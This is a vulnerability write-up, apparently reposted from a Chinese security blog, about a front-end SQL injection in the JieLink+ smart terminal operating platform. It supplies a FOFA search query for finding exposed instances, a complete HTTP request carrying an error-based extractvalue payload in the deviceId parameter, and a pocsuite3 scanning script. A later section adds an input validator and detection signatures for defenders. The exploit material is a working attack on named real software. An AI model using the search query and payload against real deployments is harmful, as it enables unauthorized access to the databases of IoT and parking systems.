Vulnerability reproduction: generic front-end SQL injection in a smart terminal operating platform (vulnerability detection script attached)

Disclaimer

The vulnerabilities described in this article have been fixed, and sensitive information has been redacted. The article is for experience sharing only; do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been redacted at multiple levels. Anyone who disseminates or uses the information provided here is responsible for any direct or indirect consequences and losses; the author bears no responsibility for them. You are answerable for any consequences yourself.

Vulnerability description

This platform is an intelligent connection platform based on Internet of Things technology. It provides comprehensive features and services for managing and monitoring various IoT devices. The platform is highly customizable and can adapt to the needs of different industries and scenarios. Through this platform, users can monitor equipment status in real time, collect and analyze data, and perform remote control and scheduling operations. The platform also supports a variety of communication protocols and device access methods to achieve interconnection and interoperability between devices. At the same time, this platform provides a friendly user interface and powerful data management functions to help users quickly build and manage IoT systems. In short, this platform provides users with convenient and efficient IoT solutions and promotes the application and development of IoT technology.

FOFA query

title="JieLink+智能终端操作平台"

PoC request and detection

POST /mobile/Remote/GetParkController HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: DefaultSystem=Mobile; ASP.NET_SessionId=533gfzuselgriachdgogkug5
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

deviceId=1'and/**/extractvalue(1,concat(char(126),database()))and'

PoC script

Written for the pocsuite3 framework.

# _*_ coding:utf-8 _*_
# @Time : 2023/12/12
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger


class JieLink_zhineng_sql(POCBase):
    pocDesc = '''智能终端操作平台前台通用SQL注入漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-12'
    name = '智能终端操作平台前台通用SQL注入漏洞'

    def _verify(self):
        result = {}
        url = self.url + '/mobile/Remote/GetParkController'
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
            "Accept": "application/json, text/plain, */*",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Connection': 'close',
            'X-Requested-With': 'XMLHttpRequest',
            "Content-Type": "application/x-www-form-urlencoded",
            'Cookie': 'DefaultSystem=Mobile; ASP.NET_SessionId=533gfzuselgriachdgogkug5'
        }
        # Same error-based payload as in the request above; the database error
        # text echoed by the server is what indicates the injection.
        data = "deviceId=1'and/**/extractvalue(1,concat(char(126),database()))and'"
        try:
            response = requests.post(url, headers=headers, data=data, timeout=10)
            if response.status_code == 200 and 'error' in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except Exception as e:
            # Do not swallow the failure silently; report it and fall through to
            # parse_output so the target is marked as not vulnerable.
            logger.warning('request to {} failed: {}'.format(url, e))
        return self.parse_output(result)

    def _attack(self):
        # No separate attack mode; the check is the same as the verification.
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(JieLink_zhineng_sql)
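For the defending side, the following is an added example (not code from the original post or from the platform vendor) of a request check for the endpoint above: an allow-list validator for deviceId, which is the real fix regardless of any signature, plus a signature check that flags the error-based technique the PoC uses, for WAF rules or log triage. The endpoint path, parameter name and payload come from the write-up; the 1-10 digit format for deviceId is an assumption, and the signature list also covers the sibling MySQL function updatexml().

```python
import re
from urllib.parse import parse_qs

# Endpoint and parameter name are taken from the write-up above.
VULN_PATH = "/mobile/Remote/GetParkController"

# Signatures of the error-based technique used in the PoC: quote breakout into an
# AND/OR clause, /**/ used as whitespace, and MySQL XML error functions.
SQLI_PATTERNS = [
    re.compile(r"'\s*(?:/\*.*?\*/)*\s*(?:and|or)\b", re.I),
    re.compile(r"/\*\*/"),
    re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
]


def device_id_is_valid(value: str) -> bool:
    """Allow-list rule: deviceId must be a plain 1-10 digit integer (assumed format)."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def sqli_indicators(value: str) -> list:
    """Return the patterns from SQLI_PATTERNS that match the given parameter value."""
    return [p.pattern for p in SQLI_PATTERNS if p.search(value)]


def inspect_request(path: str, body: str) -> dict:
    """Classify one POST as 'ignore' (other endpoint), 'allow' or 'block'."""
    if path != VULN_PATH:
        return {"verdict": "ignore", "indicators": []}
    params = parse_qs(body, keep_blank_values=True)
    device_id = params.get("deviceId", [""])[0]
    if device_id_is_valid(device_id):
        return {"verdict": "allow", "indicators": []}
    # Anything that fails the allow-list is rejected; the signatures only add
    # context for alerting, so analysts can tell probing from malformed input.
    return {"verdict": "block", "indicators": sqli_indicators(device_id)}


if __name__ == "__main__":
    # Constructed sample bodies: the PoC payload from the write-up and a benign one.
    poc_body = "deviceId=1'and/**/extractvalue(1,concat(char(126),database()))and'"
    for body in (poc_body, "deviceId=1"):
        print(body, "->", inspect_request(VULN_PATH, body))
```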

Script exploit


Origin: blog.csdn.net/jjjj1029056414/article/details/134946693